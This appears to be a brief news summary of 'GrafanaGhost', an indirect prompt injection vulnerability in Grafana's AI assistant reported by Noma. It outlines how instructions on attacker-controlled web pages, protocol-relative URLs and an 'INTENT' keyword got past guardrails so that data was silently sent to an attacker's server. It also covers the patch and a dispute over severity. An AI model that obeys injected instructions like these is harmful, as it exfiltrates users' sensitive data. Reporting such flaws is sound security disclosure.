Security researchers at Noma discovered 'GrafanaGhost,' an indirect prompt injection vulnerability in Grafana's AI assistant that could allow attackers to exfiltrate sensitive data. By embedding malicious instructions in attacker-controlled web pages using protocol-relative URLs and the 'INTENT' keyword to bypass guardrails, the AI would silently process the injected commands and send sensitive data to an attacker's server when a user performed normal interactions like browsing logs. Grafana has patched the underlying issue in its Markdown image renderer. However, Grafana and Noma dispute the severity: Grafana claims the exploit required significant user interaction and the AI warned users, while Noma insists it required fewer than two steps and operated silently without any user-visible warnings.
Sort: